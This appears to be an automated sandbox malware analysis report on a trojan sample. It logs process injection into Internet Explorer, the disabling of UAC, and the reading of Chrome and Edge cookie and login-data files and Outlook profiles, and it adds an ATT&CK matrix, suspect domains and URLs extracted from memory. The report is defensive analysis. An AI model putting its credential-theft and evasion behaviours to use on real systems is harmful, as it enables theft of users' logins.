                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Section loaded: NULL target: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe protection: execute and read and write
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Section loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: NULL target: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe protection: read write
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: NULL target: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 7848
                Source: C:\Windows\SysWOW64\wscript.exe | Thread APC queued: target process: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 954008
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: tCyxXhRNgdPI.exe, 0000000B.00000000.2250215295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499521887.0000000001731000.00000002.00000001.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499609974.0000000000D01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Queries volume information: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe VolumeInformation
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.8.dr | Binary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 21 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 123 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 512 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | NTDS | 351 Security Software Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 161 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 161 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 512 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                [Figure: Behavior Graph. ID: 1572930; Sample: Nieuwebestellingen10122024.exe; Startdate: 11/12/2024; Architecture: WINDOWS; Score: 100]

                Source | Detection | Scanner | Label | Link
                Nieuwebestellingen10122024.exe | 37% | ReversingLabs | Win64.Trojan.Swotter |
                Nieuwebestellingen10122024.exe | 31% | Virustotal | | Browse
                Nieuwebestellingen10122024.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                swenansiansie.xyz | 0% | Virustotal | | Browse
                cbprecise.online | 0% | Virustotal | | Browse
                rtpsilva4d.click | 0% | Virustotal | | Browse
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                Name | Malicious | Antivirus Detection | Reputation
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/vpstCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000014.00000003.2484394423.0000028F71720000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.20.dr, edb.log.20.drfalse
                                                                                                high
                                                                                                https://www.ripe.net/wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.lendingtree.com/?splitterid=home-equity&cproduct=homeequity&cchannel=content&csource=traBBI4MeJ[1].json.29.drfalse
                                                                                                    high
                                                                                                    https://www.imena.ua/hostingtCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.reg.ru/whois/?check=&dname=www.synd.fun&amp;reg_source=parking_autowscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://docs.google.com/manifest.json.19.drfalse
                                                                                                        high
                                                                                                        https://thehill.com/blogs/in-the-know/5032330-sheryl-crow-trump-reelection-kennedy-center-honors/me[1].json.29.drfalse
                                                                                                          high
                                                                                                          https://drive.google.com/manifest.json.19.drfalse
                                                                                                            high
                                                                                                            https://www.cnn.com/world/africa/us-queen-ghana-tamale-kennedy-johnson-spc?cid=external-feeds_iluminme[1].json.29.drfalse
                                                                                                              high
                                                                                                              http://partner.mirohost.netwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211BBI4MeJ[1].json.29.drfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://www.imena.ua/domains/premium-domainswscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.imena.ua/blog/tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.reddit.com/msapplication.xml5.15.drfalse
                                                                                                                high
                                                                                                                https://www.imena.ua/datacenterwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&amwscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.imena.ua/how-searchwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json.19.drfalse
                                                                                                                    high
                                                                                                                    https://drive-daily-4.corp.google.com/manifest.json.19.drfalse
                                                                                                                      high
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://mail.mirohost.netwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://crl.ver)svchost.exe, 00000014.00000002.4501548462.0000028F71800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.imena.ua/helptCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.ecosia.org/newtab/wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://drive-daily-1.corp.google.com/manifest.json.19.drfalse
                                                                                                                              high
                                                                                                                              https://drive-daily-5.corp.google.com/manifest.json.19.drfalse
                                                                                                                                high
                                                                                                                                https://www.foxnews.com/sports/mike-tyson-faces-1-5-million-lawsuit-over-alleged-contract-violation-me[1].json.29.drfalse
                                                                                                                                  high
                                                                                                                                  https://people.com/michael-cole-the-mod-squad-actor-dies-at-84-8759376me[1].json.29.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/chromecontent_new.js.19.dr, content.js.19.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.msn.com/?ocid=iehp{7353942D-B79B-11EF-8C2C-ECF4BB570DC9}.dat.15.drfalse
                                                                                                                                        high
                                                                                                                                        https://control.mirohost.net/auth/login.php?lang=ruwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.imena.ua/rutCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.msn.com/en-us/community/channel/vid-cj9pqbr0vn9in2b6ddcd8sfgpfq6x6utp44fssrv6mc2gtybw0usme[1].json.29.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.imena.ua/whois.php?domain=spectre.centertCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://companies.rbc.ru/wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.imena.ua/paymentstCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.youtube.com/msapplication.xml8.15.drfalse
                                                                                                                                            high
                                                                                                                                            http://ogp.me/ns#wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://booking.com/dealspage.html?campaign_id=&aid=1533676&label=enus-native-backfillBBI4MeJ[1].json.29.drfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81me[1].json.29.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://chromewebstore.google.com/manifest.json0.19.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json.19.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.imena.ua/check-domain?step=transferwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://schema.org/OrganizationtCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://chrome.google.com/webstore/manifest.json0.19.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-uatCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.yardbarker.com/entertainment/articles/20_facts_you_might_not_know_about_young_frankensteme[1].json.29.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.imena.ua/support/domains-finance/icann-i-ee-funkciiwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
